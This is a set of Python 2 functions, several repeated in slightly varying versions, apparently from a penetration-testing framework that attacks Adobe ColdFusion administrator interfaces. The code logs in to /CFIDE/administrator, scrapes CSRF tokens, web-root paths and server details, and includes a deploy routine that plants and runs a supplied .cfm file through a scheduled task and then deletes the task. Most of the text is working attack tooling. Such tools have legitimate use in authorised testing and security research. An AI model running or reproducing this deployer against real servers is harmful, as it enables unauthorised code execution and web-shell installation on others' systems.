def fetch_csrf(ip, fingerprint, url): """ Most of these requests use a CSRF; we can grab this so long as we send the request using the same session token. Returns a tuple of (cookie, csrftoken) """ if fingerprint.version not in ['9.0', '10.0', '11.0']: # versions <= 8.x do not use a CSRF token return (checkAuth(ip, fingerprint.port, title, fingerprint.version)[0], None) # lets try and fetch CSRF cookies = checkAuth(ip, fingerprint.port, title, fingerprint.version) if cookies: response = utility.requests_get(url, cookies=cookies[0]) else: utility.Msg("Could not get auth for %s:%s" % (ip, fingerprint.port), LOG.ERROR) return False if response.status_code is 200: token = findall("name=\"csrftoken\" value=\"(.*?)\">", response.content) if len(token) > 0: return (cookies[0], token[0]) else: utility.Msg("CSRF appears to be disabled.", LOG.DEBUG) return (cookies[0], None)
def fetch_csrf(ip, fingerprint, url): """ Most of these requests use a CSRF; we can grab this so long as we send the request using the same session token. Returns a tuple of (cookie, csrftoken) """ if fingerprint.version not in ['9.0', '10.0']: # versions <= 8.x do not use a CSRF token return (checkAuth(ip, fingerprint.port, title, fingerprint.version)[0], None) # lets try and fetch CSRF cookies = checkAuth(ip, fingerprint.port, title, fingerprint.version) if cookies: response = utility.requests_get(url, cookies=cookies[0]) else: utility.Msg("Could not get auth for %s:%s" % (ip, fingerprint.port), LOG.ERROR) return False if response.status_code is 200: token = findall("name=\"csrftoken\" value=\"(.*?)\">", response.content) if len(token) > 0: return (cookies[0], token[0]) else: utility.Msg("CSRF appears to be disabled.", LOG.DEBUG) return (cookies[0], None)
def fetch_webroot(ip, fingerprint): """ Pick out the web root from the settings summary page """ url = "http://{0}:{1}/CFIDE/administrator/reports/index.cfm"\ .format(ip, fingerprint.port) cookies = checkAuth(ip, fingerprint.port, title, fingerprint.version) if cookies: req = utility.requests_get(url, cookies=cookies[0]) else: utility.Msg("Could not get auth for %s:%s" % (ip, fingerprint.port), LOG.ERROR) return False if req.status_code is 200: root_regex = "CFIDE </td><td scope=row class=\"cellRightAndBottomBlueSide\">(.*?)</td>" if fingerprint.version in ["7.0"]: root_regex = root_regex.replace("scope=row ", "") data = findall(root_regex, req.content.translate(None, "\n\t\r")) if len(data) > 0: return data[0].replace("\", "\\").replace(":", ":")[:-7] else: return False
def run(self, fingerengine, fingerprint): """ Obtains remote Coldfusion information from the reports index page. This pulls the first 26 entries from this report, as there's lots of extraneous stuff. Perhaps if requested I'll prompt to extend to the remainder of the settings. """ if fingerprint.version in ["5.0", "6.0", "6.1"]: return self._run5(fingerengine, fingerprint) utility.Msg("Attempting to retrieve Coldfusion info...") base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port) uri = "/CFIDE/administrator/reports/index.cfm" if fingerprint.version in ["7.0"]: uri = '/CFIDE/administrator/settings/version.cfm' cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if not cookies: utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return else: cookies = cookies[0] try: response = utility.requests_get(base + uri, cookies=cookies) except Exception, e: utility.Msg("Failed to fetch info: %s" % e, LOG.ERROR) return
def _run5(self, fingerengine, fingerprint): """ Pull sys info from older CF instances; it is quite ugly """ utility.Msg("Attempting to retrieve Coldfusion info...") cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version)[0] if not cookies: utility.Msg( "Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) if fingerprint.version in ['5.0']: uri = '/CFIDE/administrator/server_settings/version.cfm' elif fingerprint.version in ['6.0', '6.1']: uri = '/CFIDE/administrator/settings/version.cfm' response = utility.requests_get(base + uri, cookies=cookies) if fingerprint.version in ['5.0']: keys = findall("<td height=\".*?\" nowrap>(.*?)</td>", response.content.translate(None, '\r\n'))[1:] values = findall("<td>(.*?)</td>", response.content.translate(None, '\r\n')) for (key, value) in zip(keys, values[2:]): k = findall("class=\"text2\">(.*?)</p>", key)[0].replace(" ", '').rstrip() v = findall(">(.*?)\t", value)[0].replace(' ', '') utility.Msg(" %s: %s" % (k, v)) elif fingerprint.version in ['6.0', '6.1']: keys = findall("<td height=\"18\" nowrap>(.*?)</td>", response.content.translate(None, '\r\n')) values = findall( "<td width=\"100%\" class=\"color-row\">(.*?)</td>", response.content.translate(None, '\r\n')) for (key, value) in zip(keys[:-2], values[:-2]): k = findall(" (.*?) ", key)[0].lstrip().rstrip() v = findall(" (.*?)\t", value)[0].lstrip().rstrip() utility.Msg(" %s: %s" % (k, v))
def run(self, fingerengine, fingerprint): """ Obtains remote Coldfusion information from the reports index page. This pulls the first 26 entries from this report, as there's lots of extraneous stuff. Perhaps if requested I'll prompt to extend to the remainder of the settings. """ if fingerprint.version in ["5.0", "6.0", "6.1"]: return self._run5(fingerengine, fingerprint) utility.Msg("Attempting to retrieve Coldfusion info...") base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port) uri = "/CFIDE/administrator/reports/index.cfm" if fingerprint.version in ["7.0"]: uri = '/CFIDE/administrator/settings/version.cfm' cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if not cookies: utility.Msg( "Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return else: cookies = cookies[0] try: response = utility.requests_get(base + uri, cookies=cookies) except Exception as e: utility.Msg("Failed to fetch info: %s" % e, LOG.ERROR) return if response.status_code == 200: regex = self.versionRegex(fingerprint.version) types = findall(regex[0], response.content.translate(None, "\n\t\r")) data = findall(regex[1], response.content.translate(None, "\n\t\r")) # pad if fingerprint.version in ["8.0", "9.0", "10.0", '11.0']: types.insert(0, "Version") for (row, data) in zip(types, data)[:26]: utility.Msg(' %s: %s' % (row, data[:-7]))
def _run5(self, fingerengine, fingerprint): """ Pull sys info from older CF instances; it is quite ugly """ utility.Msg("Attempting to retrieve Coldfusion info...") cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version)[0] if not cookies: utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) if fingerprint.version in ['5.0']: uri = '/CFIDE/administrator/server_settings/version.cfm' elif fingerprint.version in ['6.0', '6.1']: uri = '/CFIDE/administrator/settings/version.cfm' response = utility.requests_get(base+uri, cookies=cookies) if fingerprint.version in ['5.0']: keys = findall("<td height=\".*?\" nowrap>(.*?)</td>", response.content.translate(None, '\r\n'))[1:] values = findall("<td>(.*?)</td>", response.content.translate(None, '\r\n')) for (key, value) in zip(keys, values[2:]): k = findall("class=\"text2\">(.*?)</p>", key)[0].replace(" ",'').rstrip() v = findall(">(.*?)\t", value)[0].replace(' ','') utility.Msg(" %s: %s" % (k, v)) elif fingerprint.version in ['6.0', '6.1']: keys = findall("<td height=\"18\" nowrap>(.*?)</td>", response.content.translate(None, '\r\n')) values = findall("<td width=\"100%\" class=\"color-row\">(.*?)</td>", response.content.translate(None, '\r\n')) for (key, value) in zip(keys[:-2], values[:-2]): k = findall(" (.*?) ", key)[0].lstrip().rstrip() v = findall(" (.*?)\t", value)[0].lstrip().rstrip() utility.Msg(" %s: %s" % (k, v))
def run(self, fingerengine, fingerprint): """ Obtains remote Coldfusion information from the reports index page. This pulls the first 26 entries from this report, as there's lots of extraneous stuff. Perhaps if requested I'll prompt to extend to the remainder of the settings. """ utility.Msg("Attempting to retrieve Coldfusion info...") base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port) uri = "/CFIDE/administrator/reports/index.cfm" response = utility.requests_get(base + uri) if response.status_code == 200 and "ColdFusion Administrator Login" \ in response.content: utility.Msg("Host %s:%s requires auth, checking..." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if cookies: response = utility.requests_get(base + uri, cookies=cookies[0]) else: utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return if response.status_code == 200: types = findall("<td scope=row nowrap class=\"cell3BlueSides\">(.*?)</td>", response.content.translate(None, "\n\t\r")) data = findall("<td scope=row class=\"cellRightAndBottomBlueSide\">(.*?)</td>", response.content.translate(None, "\n\t\r")) # pad types.insert(0, "Version") for (row, data) in zip(types, data)[:26]: utility.Msg(' %s: %s' % (row, data[:-7]))
def deploy(fingerengine, fingerprint): """ Scheduled Task deployer for older versions; radically different than newer systems, so it warrants its own deployer. """ cfm_path = abspath(fingerengine.options.deploy) cfm_file = parse_war_path(cfm_path, True) dip = fingerengine.options.ip cookie = checkAuth(dip, fingerprint.port, title, fingerprint.version)[0] if not cookie: utility.Msg("Could not get auth", LOG.ERROR) return utility.Msg("Preparing to deploy {0}...".format(cfm_file)) utility.Msg("Fetching web root...", LOG.DEBUG) root = fetch_webroot(dip, fingerprint, cookie) if not root: utility.Msg("Unable to fetch web root.", LOG.ERROR) return # create the scheduled task utility.Msg("Web root found at %s" % root, LOG.DEBUG) utility.Msg("Creating scheduled task...") if not create_task(dip, fingerprint, cfm_file, root, cookie): return # invoke the task utility.Msg("Task %s created, invoking..." % cfm_file) run_task(dip, fingerprint, cfm_path, cookie) # cleanup utility.Msg("Cleaning up...") if not delete_task(dip, fingerprint, cfm_file, cookie): utility.Msg("Failed to remove task. May require manual removal.", LOG.ERROR)
class Auxiliary: def __init__(self): self.name = 'Dump host information' self.versions = ['7.0', '8.0', '9.0', '10.0'] self.show = True self.flag = 'cf-info' def check(self, fingerprint): if fingerprint.title == CINTERFACES.CFM and \ fingerprint.version in self.versions: return True return False def run(self, fingerengine, fingerprint): """ Obtains remote Coldfusion information from the reports index page. This pulls the first 26 entries from this report, as there's lots of extraneous stuff. Perhaps if requested I'll prompt to extend to the remainder of the settings. """ utility.Msg("Attempting to retrieve Coldfusion info...") base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port) uri = "/CFIDE/administrator/reports/index.cfm" if fingerprint.version in ["7.0"]: uri = '/CFIDE/administrator/settings/version.cfm' try: response = utility.requests_get(base + uri) except Exception, e: utility.Msg("Failed to fetch info: %s" % e, LOG.ERROR) return if response.status_code == 200 and "ColdFusion Administrator Login" \ in response.content: utility.Msg( "Host %s:%s requires auth, checking..." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if cookies: response = utility.requests_get(base + uri, cookies=cookies[0]) else: utility.Msg( "Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return if response.status_code == 200: regex = self.versionRegex(fingerprint.version) types = findall(regex[0], response.content.translate(None, "\n\t\r")) data = findall(regex[1], response.content.translate(None, "\n\t\r")) # pad if fingerprint.version in ["8.0", "9.0", "10.0"]: types.insert(0, "Version") for (row, data) in zip(types, data)[:26]: utility.Msg(' %s: %s' % (row, data[:-7]))